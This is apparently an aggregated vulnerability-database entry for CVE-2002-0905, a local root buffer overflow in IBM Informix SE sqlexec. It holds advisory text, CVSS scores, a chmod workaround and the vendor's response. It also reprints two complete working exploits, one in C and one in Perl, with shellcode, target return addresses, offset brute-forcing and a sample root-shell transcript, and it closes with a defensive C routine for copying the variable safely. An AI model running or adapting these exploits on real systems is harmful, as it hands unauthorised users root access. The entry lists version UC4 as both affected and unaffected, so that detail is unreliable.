CVE-2002-0905
CVSS7.2
Published: 2002-10-04 00:00:00
Revised: 2008-09-05 16:29:15
NMCOES    

[Original] Buffer overflow in sqlexec for Informix SE-7.25 allows local users to gain root privileges via a long INFORMIXDIR environment variable.


[CNNVD] IBM Informix SE sqlexec local buffer overflow vulnerability (CNNVD-200210-231)

        
Informix is an enterprise database system developed and maintained by IBM.
sqlexec in Informix-SE on Linux mishandles an environment variable, which lets a local attacker trigger a buffer overflow and escalate privileges.
sqlexec in Informix-SE does not adequately check the length of the INFORMIXDIR environment variable before copying it into a local buffer. A local attacker can supply an overly long string as INFORMIXDIR, which overflows the buffer when sqlexec processes it. Because sqlexec is installed setuid root, a carefully crafted string can lead to execution of arbitrary instructions on the system with root privileges.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:ibm:informix:7.25_.uc1_se    IBM Informix 7.25 .UC1 SE
cpe:/a:ibm:informix:7.25_.uc3_se    IBM Informix 7.25 .UC3 SE
cpe:/a:ibm:informix:7.25_.uc2_se    IBM Informix 7.25 .UC2 SE

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0905
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0905
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-231
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/4891
(VENDOR_ADVISORY)  BID  4891
http://www.iss.net/security_center/static/9219.php
(VENDOR_ADVISORY)  XF  informix-sqlexec-bo(9219)
http://archives.neohapsis.com/archives/bugtraq/2002-05/0270.html
(UNKNOWN)  BUGTRAQ  20020529 Informix SE-7.25 /lib/sqlexec Vulnerability

- Vulnerability information

IBM Informix SE sqlexec local buffer overflow vulnerability
High severity   Boundary condition error
2002-10-04 00:00:00 2005-10-20 00:00:00
Local
        
Informix is an enterprise database system developed and maintained by IBM.
sqlexec in Informix-SE on Linux mishandles an environment variable, which lets a local attacker trigger a buffer overflow and escalate privileges.
sqlexec in Informix-SE does not adequately check the length of the INFORMIXDIR environment variable before copying it into a local buffer. A local attacker can supply an overly long string as INFORMIXDIR, which overflows the buffer when sqlexec processes it. Because sqlexec is installed setuid root, a carefully crafted string can lead to execution of arbitrary instructions on the system with root privileges.
        

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* chmod a-s /lib/sqlexec
Vendor patch:
IBM
---
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:

http://www.informix.com/

- Vulnerability information (21496)

IBM Informix SE 7.25 sqlexec Buffer Overflow Vulnerability (1) (EDBID:21496)
linux local
2002-05-30 Verified
0 smurf
source: http://www.securityfocus.com/bid/4891/info

Informix is an enterprise database distributed and maintained by IBM.

A buffer overflow vulnerability has been reported for Informix-SE for Linux. The overflow is due to an unbounded string copy of the INFORMIXDIR environment variable to a local buffer. There is at least one setuid root executable that is vulnerable, `sqlexec'. A malicious user may exploit the overflow condition in sqlexec to gain root privileges. 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

#define BUFFERSIZE 2032

/* linux x86 shellcode */
char lunixshell[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

struct target {
    char *os_name;
    u_long retadd;
    u_long offset;
};

struct target targets[] = {
    { "RedHat 7.0 - Guinness   ", 0xbfffee04, 895 },
    { "Mandrake 8.2 - Bluebird", 0xbfffee30, -1999 },
    { NULL, 0L, 0L }
};

int type = -1;

void usage(char *cmd)
{
    int i;

    printf("[<>] - IBM x86 IBM INFORMIX SE-7.25 sqlexec local root exploit\n");
    printf("[<>] - by smurf, division7 security systems\n");
    printf("[<>] - usage: %s  -t target -r [return address] -o [offset]\n", cmd);
    printf("[<>] - Targets:\n\n");

    /* index and name are read in separate expressions so the increment is
       not unsequenced with the array access */
    for (i = 0; targets[i].os_name != NULL; i++)
        printf("[ Type %d:  [ %s ]\n", i, targets[i].os_name);
}

int main(int argc, char *argv[])
{
    int i, c;
    int ntargets = (int)(sizeof(targets) / sizeof(targets[0])) - 1;
    long *addr_ptr;
    char *buffer, *ptr;

    if (argc < 3) {
        usage(argv[0]);
        return 1;
    }

    while ((c = getopt(argc, argv, "t:r:o:")) != -1) {
        switch (c) {
        case 't':
            type = atoi(optarg);
            break;

        case 'r':
        case 'o':
            /* -t must be given first: these override the selected target */
            if (type < 0 || type >= ntargets) {
                usage(argv[0]);
                return 1;
            }
            if (c == 'r')
                targets[type].retadd = strtoul(optarg, NULL, 16);
            else
                targets[type].offset = atoi(optarg);
            break;

        default:
            usage(argv[0]);
            return 1;
        }
    }

    if (type < 0 || type >= ntargets) {
        usage(argv[0]);
        return 1;
    }

    printf("[<>] - Stack pointer: 0x%lx\n", targets[type].retadd);
    printf("[<>] - Offset: 0x%lx\n", targets[type].offset);
    printf("[<>] - Return addr: 0x%lx\n", targets[type].retadd - targets[type].offset);

    /* allocate memory for our buffer */
    if (!(buffer = malloc(BUFFERSIZE))) {
        printf("Couldn't allocate memory.\n");
        exit(-1);
    }

    /* fill buffer with ret addr's */
    ptr = buffer;
    addr_ptr = (long *)ptr;
    for (i = 0; i < BUFFERSIZE; i += 4)
        *(addr_ptr++) = targets[type].retadd - targets[type].offset;

    /* fill first half of buffer with NOPs */
    for (i = 0; i < BUFFERSIZE / 2; i++)
        buffer[i] = '\x90';

    /* insert shellcode in the middle */
    ptr = buffer + ((BUFFERSIZE / 2) - (strlen(lunixshell) / 2));
    for (i = 0; i < strlen(lunixshell); i++)
        *(ptr++) = lunixshell[i];

    /* call the vulnerable program passing our exploit buffer as the argument */
    buffer[BUFFERSIZE - 1] = 0;
    setenv("INFORMIXDIR", buffer, 1);
    execl("./sqlexec", "sqlexec", NULL);
    return 0;
}


- Vulnerability information (21497)

IBM Informix SE 7.25 sqlexec Buffer Overflow Vulnerability (2) (EDBID:21497)
linux local
2002-05-30 Verified
0 pHrail
source: http://www.securityfocus.com/bid/4891/info
 
Informix is an enterprise database distributed and maintained by IBM.
 
A buffer overflow vulnerability has been reported for Informix-SE for Linux. The overflow is due to an unbounded string copy of the INFORMIXDIR environment variable to a local buffer. There is at least one setuid root executable that is vulnerable, `sqlexec'. A malicious user may exploit the overflow condition in sqlexec to gain root privileges. 

#!/usr/bin/perl
# IBM SE 7.25.UC1 for INTEL LINUX 2.4 GLIBC2.2.X
# Local Root Exploit by pHrail
# This exploits the sqlexec binary, and yields UID=0
# Tested on Mandrake Linux 8.2.  All other Linux presumed vulnerable
#
# IBM still hasn't patched this hole, and is available on their
# website http://www.informix.com/evaluate/
#
# shouts to Division7 and smurfy for help testing on this
# http://www.divisi0n7.org
#
# [phrail@phrailnix phrail]$ ./ibm.pl -2000
# *** Division 7 Security
# *** Now Exploiting sqlexec
# *** Offset: 0xfffff830
# *** Return: 0xbfffeb00
# *** Address: 0xbfffe330
# sh-2.05# id
# uid=0(root) gid=501(phrail) groups=501(phrail),43(usb)
# sh-2.05#
#
# (Note) May want to increase $buf 4 to 8 bytes depending on OS
use strict;

# $SIG{INT} = \&controlme;

my $argsnum = @ARGV;

if ($argsnum < 0 || $argsnum > 1) {
    &usage;
    exit;
}

# -2000 seemed to work on Mandrake 8.2

my $offset = $ARGV[0];
$offset = 0 unless $offset;

my $ret = 0xbfffeb00;

my $buf = 2024;

my $nop = "\x90";

# Our generic 48 byte shellcode.
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
                "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
                "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
                "\x80\xe8\xdc\xff\xff\xff/bin/sh";

print "*** Now Overflowing INFORMIXDIR Variable\n";
$ENV{'INFORMIXDIR'} = "A" x 2024;
print "*** Now Calculating Your esp (Return Address Value)\n";
my $gotaddr = `gdb --command=gdbfile sqlexec | grep esp | cut -f2`;
print "*** Your Calculated Return Address Is $gotaddr\n";
print "*** Calculating Other Possible Addresses\n";

# gdb prints the register as a hex string; convert it with hex() so the
# arithmetic below works on the numeric value rather than on the text
chomp($gotaddr);
$gotaddr =~ s/^\s+|\s+$//g;
my $get = hex($gotaddr);

my $minus = 4;
my @oop = (
    $get - $minus,
    $get - 2 * $minus,
    $get,
    $get + $minus,
    $get + 2 * $minus,
);

for my $n (0 .. 4) {
    printf("*** Gots %d 0x%lx\n", $n + 1, $oop[$n]);
}
printf("*** Gots 6 Default 0x%lx\n", $ret);
print "*** Which esp do you want to use? (1 - 6) : ";
chomp(my $retv = <STDIN>);
my $retva;
if ($retv =~ /^[1-5]$/) {
    $retva = $oop[$retv - 1];
} elsif ($retv == 6) {
    print "*** Using Default Return Address\n";
    $retva = $ret;
} else {
    print "Invalid Option Lamer (1 - 6)\n";
    print "Goodbye\n";
    exit;
}

print "*** Do you want to brute? ( Y - N) : ";
chomp(my $brutea = <STDIN>);

if ($brutea =~ /y/i) {
    &brute;
} else {
    &nbrute;
}

# NOP sled, then the shellcode, then the return address repeated out to $buf bytes
sub build_buffer {
    my ($addr) = @_;
    my $buffer = $nop x ($buf - length($shellcode) - 100);
    $buffer .= $shellcode;
    $buffer .= pack('l', $addr) x int(($buf - length($buffer)) / 4);
    return $buffer;
}

sub nbrute {
    print "*** Division 7 Security\n";
    print "*** Now Exploiting sqlexec\n";
    printf("*** Offset: 0x%lx\n", $offset);
    printf("*** Return: 0x%lx\n", $retva);
    printf("*** Address: 0x%lx\n", $retva + $offset);
    # the address written into the buffer is the one printed above
    $ENV{'INFORMIXDIR'} = build_buffer($retva + $offset);
    exec("./home/phrail/SE/lib/sqlexec");
}

sub brute {
    print "Now Bruting Offsets -2000 - 2000\n";
    for (my $p = -2000; $p < 2000; $p++) {
        # the buffer is rebuilt for every offset instead of growing across iterations
        $ENV{'INFORMIXDIR'} = build_buffer($retva + $p);
        print " *";
        system("./home/phrail/SE/lib/sqlexec");
    }
    print "\nDone bruting...try another return address or increase the buffer.\n";
    print "Division 7 Security Systems\n";
    print "-pHrail\n";
    exit;
}

sub controlme {
    $SIG{INT} = \&controlme;
    print "Signal Caught Now Exiting\n";
    print "Divison 7 Security Systems\n";
    exit;
}

sub usage {
    print "*** IBM SE 7.25.UC1 for INTEL LINUX 2.4 GLIBC2.2.X\n";
    print "*** Local Root Exploit by pHrail\n";
    print "*** Division 7 Security Systems\n";
    print "*** http://www.divisi0n7.org\n";
    print "*** $0 <offset>\n";
}
		

- Vulnerability information

10134
IBM Informix sqlexec INFORMIXDIR Environment Variable Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-05-29 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

IBM Informix SE sqlexec Buffer Overflow Vulnerability
Boundary Condition Error 4891
Remote: No  Local: Yes
2002-05-30 12:00:00 2009-07-11 01:56:00
Credited to Juan Manuel Pascual Escriba <pask@hades2.concha.upv.es>.

- Affected versions

IBM Informix SE 7.25 .UC3
IBM Informix SE 7.25 .UC2
IBM Informix SE 7.25 .UC1
IBM Informix SE 7.25 .UC4

- Unaffected versions

IBM Informix SE 7.25 .UC4

- Vulnerability discussion

Informix is an enterprise database distributed and maintained by IBM.

A buffer overflow vulnerability has been reported for Informix-SE for Linux. The overflow is due to an unbounded string copy of the INFORMIXDIR environment variable to a local buffer. There is at least one setuid root executable that is vulnerable, `sqlexec'. A malicious user may exploit the overflow condition in sqlexec to gain root privileges.
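The defect described above is the classic unbounded copy of an environment variable into a fixed-size buffer inside a setuid root program. The C below is an added illustration for this page and is not code from Informix or from either exploit author: it places the unsafe pattern beside a hardened replacement that refuses over-long or non-absolute values outright instead of truncating them. The buffer size INFORMIXDIR_MAX and all function names are assumptions made for the example; the page does not give sqlexec's real buffer size. The self-check helper constructs a 2024-byte value, the length the published exploits used, and confirms it is rejected.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the example; the page does not give sqlexec's real one. */
#define INFORMIXDIR_MAX 256

/* The pattern the advisory describes: an environment value copied into a
 * fixed-size buffer with no length check. Kept only for contrast and never
 * called below; a value longer than the buffer writes past its end. */
void informixdir_unsafe(const char *env_value, char out[INFORMIXDIR_MAX])
{
    strcpy(out, env_value);
}

/* Hardened replacement: a privileged program should reject an over-long or
 * malformed value rather than truncate it or copy past the buffer.
 * Returns 0 on success; -1 with errno set (ENAMETOOLONG, EINVAL) on rejection. */
int informixdir_safe(const char *env_value, char *out, size_t out_len)
{
    if (env_value == NULL || out == NULL || out_len == 0) {
        errno = EINVAL;
        return -1;
    }
    /* memchr bounds the scan to out_len bytes, so an over-long value is
     * detected without ever reading more than the buffer could hold. */
    const char *end = memchr(env_value, '\0', out_len);
    if (end == NULL) {
        errno = ENAMETOOLONG;
        return -1;
    }
    size_t n = (size_t)(end - env_value);
    if (n == 0 || env_value[0] != '/') {
        errno = EINVAL;      /* only an absolute installation path makes sense */
        return -1;
    }
    memcpy(out, env_value, n + 1);   /* n + 1 <= out_len, terminator included */
    return 0;
}

/* Reads INFORMIXDIR from the real environment through the checked copy. */
int load_informixdir(char *out, size_t out_len)
{
    const char *v = getenv("INFORMIXDIR");
    if (v == NULL) {
        errno = ENOENT;
        return -1;
    }
    return informixdir_safe(v, out, out_len);
}

/* Self-check helper: 1 if the value is accepted and copied intact, else 0. */
int accepts(const char *value)
{
    char dir[INFORMIXDIR_MAX];
    if (informixdir_safe(value, dir, sizeof dir) != 0)
        return 0;
    return strcmp(dir, value) == 0;
}

/* Self-check helper: builds a constructed value "/AAAA..." of total length n
 * and returns 1 if the checked copy rejects it with ENAMETOOLONG, 0 if it is
 * accepted, -1 on allocation failure. */
int rejects_overlong(size_t n)
{
    char dir[INFORMIXDIR_MAX];
    char *value = malloc(n + 1);
    int rejected;
    if (value == NULL)
        return -1;
    memset(value, 'A', n);
    value[0] = '/';
    value[n] = '\0';
    rejected = (informixdir_safe(value, dir, sizeof dir) == -1 && errno == ENAMETOOLONG);
    free(value);
    return rejected;
}

int main(void)
{
    char dir[INFORMIXDIR_MAX];
    if (load_informixdir(dir, sizeof dir) != 0) {
        perror("INFORMIXDIR rejected");
        return 1;
    }
    printf("INFORMIXDIR=%s\n", dir);
    return 0;
}
```

Run stand-alone it reads INFORMIXDIR from the environment and exits non-zero with a diagnostic for any value the checked copy refuses. The design point is that rejection, not silent truncation, is the right failure mode for a setuid program: a truncated path would still be used for file lookups with root privileges, which is a different bug.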

- Exploits

Two exploits have been published by Division 7 Security Systems:

- Solution

IBM has released the following response to this issue:

"IBM Informix Database Engineering recognizes this problem which was first successfully reported to IBM Informix on 2002-05-31 via the Bugtraq Digest. Our thanks go to Juan Manual Pascual Escriba <pask@cmlc.upv.es> for bringing the matter to our attention.

The problem is known to occur in SE version 7.25.UC3 and earlier versions of the 7.2x family. There is no known workaround, but there is a fix available. Licensees should contact their local Support Center for an upgrade to IBM Informix SE version 7.25.UC4."

- References
